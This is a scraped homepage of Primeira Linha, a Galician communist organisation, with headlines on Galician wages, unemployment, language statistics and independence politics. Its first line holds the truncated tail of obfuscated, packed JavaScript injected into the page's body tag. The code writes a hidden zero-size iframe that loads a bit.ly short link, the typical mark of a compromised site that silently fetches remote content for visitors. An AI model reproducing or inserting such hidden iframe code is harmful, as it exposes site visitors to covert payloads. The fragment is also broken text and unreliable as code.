\');',15,15,'|iframe|document|write|src|http|bit|ly|2b4mWbk|border|width|height|style|visibility|hidden'.split('|'),0,{}))" alink="#000000" bgcolor="#ffffff" link="#000000" text="#000000" vlink="#000000">
Cinco filiados da CIG sofrem condenas económicas e de prisom
 

Assina em solidariedade com a esquerda abertzale basca (+...)

Galiza, a people fighting for independence and socialism (+...)

Opiniom

O mal galego da "lealdade a Espanha". | Maurício Castro (+...)

Mass media e políticas de massas: Perspectivas conservadora, liberal e marxista | James Petras (+...)

Euskal Herria, laboratório repressivo do «novo» capitalismo | Alizia Stürtze (+...)

Devemos colaborar com Garzón? | Carlos Morais (+...)

Celia, um furacám militante. (+...)| Néstor Kohan (+...)

Capitalismo para muito tempo?| Eduardo Montes de Oca (+...)

 

 

 

 

 
 
Apresentamos a traduçom galega de um trabalho do economista Jorge Beinstein que ajuda a perceber o alcance da crise capitalista actual, que indica o fim de um modo de produçom histórico na sua etapa de senilidade e autodestruiçom. (+...)
As crises na era senil do capitalismo
Nom som dados actuais, mas de há cinco anos, que por algum motivo a filo-espanhola Real Academia Galega mantivo na gaveta desde 2004 e só agora começa a difundir. Os primeiros dados publicados, referidos à língua inicial, confirmam as análises independentistas da última década: o espanhol está perto de se converter, pola primeira vez na história da Galiza, na língua maioritária deste povo em termos absolutos. (+...)
A RAG mantivo seqüestrados 5 anos dados fundamentais sobre a acelerada espanholizaçom do nosso povo
A classe trabalhadora galega está entre a pior paga do Estado, só acima da Estremadura e das Canárias, segundo dados oficiais do Inquérito Trimestral de Custo Laboral correspondente ao quarto trimestre de 2008. Na Galiza, os trabalhadores e as trabalhadoras ganham, em média, 16,33 euros por hora, o que supom 6,07 euros abaixo da média espanhola. (+...)
O custo salarial na Galiza, entre os mais baixos do Estado espanhol
Vários milhares de operários e operárias galegas respondêrom à convocatória sindical de um novo 10 de Março marcado pola grave crise sistémica mundial, que se manifesta de maneira específica na Galiza, a ponto de começar umha nova legislatura com o PP à frente da instituiçom autonómica. (+...)
A Classe Obreira Galega mobiliza-se em defesa do emprego e das prestaçon sociais
Reproduzimos o artigo assinado por Xavier Moreda sobre os resultados das eleiçons do passado domingo na Comunidade Autónoma da Galiza. (+...)
“Es evidente que se han cometido errores” (Pepe Blanco, porta-voz da grima)
10 de Março: 41% dos desempregados e desempregadas galegas carecem de qualquer ajuda económica
A dous dias do Dia da Classe Obreira Galega, fijo-se público que quase metade das galegas e dos galegos oficialmente reconhecidos como desempregados carecem de qualquer ajuda económica das instituiçons públicas, responsáveis pola precária situaçom laboral de cada vez mais trabalhadores e trabalhadoras do nosso país. (+...)
Abrente nº 50 (Outubro-Novembro-Dezembro 2008

Dúzia de pessoas concentrárom-se na passada quinta-feira em frente dos tribunais de Vigo. (+...)

Contacto

Versons em: (html) (pdf)

· Primeira Linha em rede · Edita: Comité Central de Primeira Linha · Sede Nacional: Rua Costa do Vedor 47, rés-do-chao 15.704 Compostela · Galiza·

Estás no sítio web oficial de Primeira Linha, organizaçom comunista galega integrada no MLNG para luitar pola superaçom da opressom nacional e social de género imposta polo capitalismo espanhol sobre a Galiza (+...)

- NÓS-UP contra o novo cinturom periférico em Compostela (+...)
Clica aqui e converte-nos na tua página inicial
Clica aqui e incorpora-nos à tua lista de favoritos
Destaques anteriores (+...)
Conselho de Redaçom: Comité Central de Primeira Linha

Boa resposta das mulheres trabalhadoras no 8 de Março

Centenas de mulheres percorrêrom as ruas das principais cidades galegas convocadas pola Marcha Mundial das Mulheres na Galiza. (+...)